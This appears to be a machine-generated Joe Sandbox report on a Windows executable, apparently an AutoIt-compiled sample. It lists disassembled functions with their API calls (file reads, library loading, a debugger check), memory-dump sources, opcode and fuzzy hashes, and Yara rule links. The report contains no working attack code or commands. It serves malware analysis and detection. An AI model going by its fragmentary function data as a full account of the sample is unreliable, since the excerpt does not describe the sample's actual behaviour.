                                                • Instruction ID: f3655c98a1fc86e56a02975a60b6e08688d225cabc7590900af4146bfbb01053
                                                • Opcode Fuzzy Hash: 7c7c783e3ddbb23735007cd077e63827cf94ccfb6b0e7fbbd34a06c555d4a562
                                                • Instruction Fuzzy Hash: D1E08632140218B7DB211B54EC09FEE7F28AF45760F148221FB64690E08BB52921D79C
                                                Function 0077AB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: CALL
                                                • API String ID: 0-4196123274
                                                • Opcode ID: 945aedd45f0fc38bf9475a9b234e013ff7f0f08aacede952b3b352fd8e14cbf8
                                                • Instruction ID: 3947ce3fe7ea8eb24416229ee81a43c9afe044b64bee926a512202cfb1d12d56
                                                • Opcode Fuzzy Hash: 945aedd45f0fc38bf9475a9b234e013ff7f0f08aacede952b3b352fd8e14cbf8
                                                • Instruction Fuzzy Hash: C8223770608201DFDB28DF14C494B6ABBE1BF85344F14C96DE99A8B361D739ED45CB82
                                                Function 00774DD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: EA06
                                                • API String ID: 4104443479-3962188686
                                                • Opcode ID: 46539e4ab57432fe4f2a8e332897d3a9c903cdbcd2e4d9a097b23307e397a074
                                                • Instruction ID: 4f5c5cefb2671e443511c89587eb60da3f2ee275acb8eeeb34830e929935124f
                                                • Opcode Fuzzy Hash: 46539e4ab57432fe4f2a8e332897d3a9c903cdbcd2e4d9a097b23307e397a074
                                                • Instruction Fuzzy Hash: F5418071A04654DBCF218B6488557BE7FA6AF46390F58C075FC4A97182C7AC5D40C7E1
                                                Function 007D785C Relevance: 3.1, APIs: 2, Instructions: 133COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID:
                                                • API String ID: 4104443479-0
                                                • Opcode ID: 383d694989dbc0baf493a8b16536f7282400de84b595401dfd2a8dbd0c38f622
                                                • Instruction ID: d0144fba0efbabb61b2cb7e462b5bfd3cb59ba2fccd0d55aa23d6bbb61aaf4d1
                                                • Opcode Fuzzy Hash: 383d694989dbc0baf493a8b16536f7282400de84b595401dfd2a8dbd0c38f622
                                                • Instruction Fuzzy Hash: AA411972518205DFCB28EF68D88597EB7B9EF09350B24845BF18597342FB78AD02C760
                                                Function 00777BB1 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID:
                                                • API String ID: 4104443479-0
                                                • Opcode ID: 7a447dba67378a8f7c08d596f502d4e7aa3d4b1fcc59dbac081316eacd8ee575
                                                • Instruction ID: 5cf5f0555a3caad00b80be1c4cfc5a24d1d49d2cc0ced5626908a8ea9e6d2861
                                                • Opcode Fuzzy Hash: 7a447dba67378a8f7c08d596f502d4e7aa3d4b1fcc59dbac081316eacd8ee575
                                                • Instruction Fuzzy Hash: EB31B6B2604506EFCB18DF28D8D1E69F3A9FF48360715C629E519CB291DB74E960CBA0
                                                Function 0077492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                Download Yara Rule
                                                APIs
                                                • IsThemeActive.UXTHEME ref: 00774992
                                                  • Part of subcall function 007934EC: __lock.LIBCMT ref: 007934F2
                                                  • Part of subcall function 007934EC: DecodePointer.KERNEL32(00000001,?,007749A7,007C7F9C), ref: 007934FE
                                                  • Part of subcall function 007934EC: EncodePointer.KERNEL32(?,?,007749A7,007C7F9C), ref: 00793509
                                                  • Part of subcall function 00774A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00774A73
                                                  • Part of subcall function 00774A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00774A88
                                                  • Part of subcall function 00773B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00773B7A
                                                  • Part of subcall function 00773B4C: IsDebuggerPresent.KERNEL32 ref: 00773B8C
                                                  • Part of subcall function 00773B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,008352F8,008352E0,?,?), ref: 00773BFD
                                                  • Part of subcall function 00773B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00773C81
                                                • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 007749D2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                • String ID:
                                                • API String ID: 1438897964-0
                                                • Opcode ID: 452e403160a078e7ef8a140261f9b88d22ebb447d9a6bf1cae00f8f7ba9855d4
                                                • Instruction ID: 4991e3b2ece510533a9ae8e026d652454a4f6fa0a1e95de92135f21c5828b774
                                                • Opcode Fuzzy Hash: 452e403160a078e7ef8a140261f9b88d22ebb447d9a6bf1cae00f8f7ba9855d4
                                                • Instruction Fuzzy Hash: 31116A719093119BCB00EF29E84995AFBE8FBC8750F00C91EF549932B2DB749944CB96
                                                Function 00775DF9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00775981,?,?,?,?), ref: 00775E27
                                                • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00775981,?,?,?,?), ref: 007AE0CC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: a68a2bab362c32334259f683f13e1df9aad820b7f5186bf36a8dd41cbb2f0ac0
                                                • Instruction ID: fb02b886a6ea56b201140d1503a9d2e983fecfe51c11838a81016d61ab6adc8f
                                                • Opcode Fuzzy Hash: a68a2bab362c32334259f683f13e1df9aad820b7f5186bf36a8dd41cbb2f0ac0
                                                • Instruction Fuzzy Hash: 79014070144608BEF7251F24CC8AF663A9CAB057A8F10C329BAE95A1E0C6F95E558B54
                                                Function 00790F36 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0079588C: __FF_MSGBANNER.LIBCMT ref: 007958A3
                                                  • Part of subcall function 0079588C: __NMSG_WRITE.LIBCMT ref: 007958AA
                                                  • Part of subcall function 0079588C: RtlAllocateHeap.NTDLL(011F0000,00000000,00000001,00000000,?,?,?,00790F53,?), ref: 007958CF
                                                • std::exception::exception.LIBCMT ref: 00790F6C
                                                • __CxxThrowException@8.LIBCMT ref: 00790F81
                                                  • Part of subcall function 0079871B: RaiseException.KERNEL32(?,?,?,00829E78,00000000,?,?,?,?,00790F86,?,00829E78,?,00000001), ref: 00798770
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                • String ID:
                                                • API String ID: 3902256705-0
                                                • Opcode ID: 82df057612b112fa07e302be1a75da9f56d3db859ccfbebe1740bd7cb1f9989f
                                                • Instruction ID: 1578f1cb0eecdc78c09e2791770d4d983c3e059e143521384ef3235308cae7ed
                                                • Opcode Fuzzy Hash: 82df057612b112fa07e302be1a75da9f56d3db859ccfbebe1740bd7cb1f9989f
                                                • Instruction Fuzzy Hash: DBF0A43150421DAACF20EA94FC099EE7BADEF01350F100465FD08D6282EFB88B54C2D1
                                                Function 0079576D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: __lock_file_memset
                                                • String ID:
                                                • API String ID: 26237723-0
                                                • Opcode ID: 8bdf451d5685cc2f81a2fd6268743364dd35c933aed39b872b4fea227f252041
                                                • Instruction ID: 57ba7a700220a4d3a71d3b217ef9610dad6a706a1ff04c0b9842fd72f0f9446a
                                                • Opcode Fuzzy Hash: 8bdf451d5685cc2f81a2fd6268743364dd35c933aed39b872b4fea227f252041
                                                • Instruction Fuzzy Hash: E9018431801A19EBCF12AFA9BC0949E7B62FF91360F148215F8245A151D7398A21DB92
                                                Function 00795516 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00798CA8: __getptd_noexit.LIBCMT ref: 00798CA8
                                                • __lock_file.LIBCMT ref: 0079555B
                                                  • Part of subcall function 00796D8E: __lock.LIBCMT ref: 00796DB1
                                                • __fclose_nolock.LIBCMT ref: 00795566
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                • String ID:
                                                • API String ID: 2800547568-0
                                                • Opcode ID: e22703a72b10a14a866dabc2083baf5abd1408c76b8edb261a6344601a94f4f1
                                                • Instruction ID: d9031d76660af5ed5bd6218d8830760b67d256db7ac91dc96c7475c0f789460c
                                                • Opcode Fuzzy Hash: e22703a72b10a14a866dabc2083baf5abd1408c76b8edb261a6344601a94f4f1
                                                • Instruction Fuzzy Hash: 75F0B471901A20DBDF527F75BC0A76E67A3AF42331F268209F424AB1C2CB7C49419B56
                                                Function 00782123 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ef94ce616c4c6930aa3f97d8123287fbd9fbc3e79cd9ce241e70ea490035aded
                                                • Instruction ID: 2e619bf881b072fa20018f3aee64ff987cf504f0d3121ab8d6df51686a9c85ed
                                                • Opcode Fuzzy Hash: ef94ce616c4c6930aa3f97d8123287fbd9fbc3e79cd9ce241e70ea490035aded
                                                • Instruction Fuzzy Hash: A1518034700604EFCF14EB54C999FAD77A6AF45760F148468FA4AAB392DB38ED01CB51
                                                Function 00775C4E Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00775CF6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: f2f64a3ba486351c5cb4cece968a0267c57b9dbc93ee0b8bdf080b62845e2edd
                                                • Instruction ID: c722f476ec0879ae92bc33289775bd77b6863927b744925120d50e527b75479c
                                                • Opcode Fuzzy Hash: f2f64a3ba486351c5cb4cece968a0267c57b9dbc93ee0b8bdf080b62845e2edd
                                                • Instruction Fuzzy Hash: F2313C71A00B0AEBCF18DF29C48466DB7B5FF48350F15C629E81993710D7B5AD60DB90
                                                Function 00790D88 Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: CallProcWindow
                                                • String ID:
                                                • API String ID: 2714655100-0
                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                • Instruction ID: ec4129fb1d1170d826740c5f9fd2e3a91be0827115d25f705620cf8d45795029
                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                • Instruction Fuzzy Hash: 9831B175A101059FCB18EF58E484969FBB6FF49300B688AA5E40ACB655DB35EDC1CBC0
                                                Function 007B0005 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ClearVariant
                                                • String ID:
                                                • API String ID: 1473721057-0
                                                • Opcode ID: b2420dcedb9f77b8f15caef758e6385dc8b0ea07391444a5b27b32f55cd70dbb
                                                • Instruction ID: 9f804acdb9b743ff8bcc14883134c0ca7ba2276e6875e1fd4d18ced366616280
                                                • Opcode Fuzzy Hash: b2420dcedb9f77b8f15caef758e6385dc8b0ea07391444a5b27b32f55cd70dbb
                                                • Instruction Fuzzy Hash: 6D414B70508341DFDB24DF14C488B1ABBE1BF84354F0988ACE9898B362D73AE845CB92
                                                Function 00777CB3 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID:
                                                • API String ID: 4104443479-0
                                                • Opcode ID: d1804af4368f735451a106a09b075585887c8acb712456119fb31bc3140c2fd3
                                                • Instruction ID: a9bfa4c2bf63ee3c62e824cbef8c17f8895619f4c10542c572417b5e25d543af
                                                • Opcode Fuzzy Hash: d1804af4368f735451a106a09b075585887c8acb712456119fb31bc3140c2fd3
                                                • Instruction Fuzzy Hash: 21214872604A08EBCF285F61FC4176A7BB8FF55390F21C62EE48AC5092EB3890D1D754
                                                Function 00774F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00774D13: FreeLibrary.KERNEL32(00000000,?), ref: 00774D4D
                                                  • Part of subcall function 007953CB: __wfsopen.LIBCMT ref: 007953D6
                                                • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,008352F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00774F6F
                                                  • Part of subcall function 00774CC8: FreeLibrary.KERNEL32(00000000), ref: 00774D02
                                                  • Part of subcall function 00774DD0: _memmove.LIBCMT ref: 00774E1A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Library$Free$Load__wfsopen_memmove
                                                • String ID:
                                                • API String ID: 1396898556-0
                                                • Opcode ID: 8bfad51c166bdac0fef0de9a49fc09577b964891c9073434021978d895d38394
                                                • Instruction ID: 59b81f738ffebba17a2055088de03fcd75e5efb9055edb93a85af528e185a2ab
                                                • Opcode Fuzzy Hash: 8bfad51c166bdac0fef0de9a49fc09577b964891c9073434021978d895d38394
                                                • Instruction Fuzzy Hash: B511E732700709EBCF25AF70CC1AB6E77A59F41750F10C829F945A6281DFB99E15DBA0
                                                Function 007B00DE Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ClearVariant
                                                • String ID:
                                                • API String ID: 1473721057-0
                                                • Opcode ID: 146d87f067cb1b6ce6b6779c14546ff3d844492454f744ad081584bffb02aef7
                                                • Instruction ID: 5c6083656ba67a65de036daeb8303059d63ebb0a0b062b746e94075e95588f1f
                                                • Opcode Fuzzy Hash: 146d87f067cb1b6ce6b6779c14546ff3d844492454f744ad081584bffb02aef7
                                                • Instruction Fuzzy Hash: BD212FB0508341DFEB24DF24C849B1BBBE1BF88354F048968F99A87721D739E815CB92
                                                Function 00775D20 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00775807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00775D76
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 73a1355b031bdc75a771e0f09f8854f265dd8209c4e8e2a9650f0b5825a3778a
                                                • Instruction ID: fa644a9d3aada5004393675322d46a142ac03c9ae3c2a67986e11b954027c1c2
                                                • Opcode Fuzzy Hash: 73a1355b031bdc75a771e0f09f8854f265dd8209c4e8e2a9650f0b5825a3778a
                                                • Instruction Fuzzy Hash: 0B113631300B059FDB308F55C888B62B7E9EF457A0F10C92EE4AE86A50D7B8F945CB60
                                                Function 00777F41 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
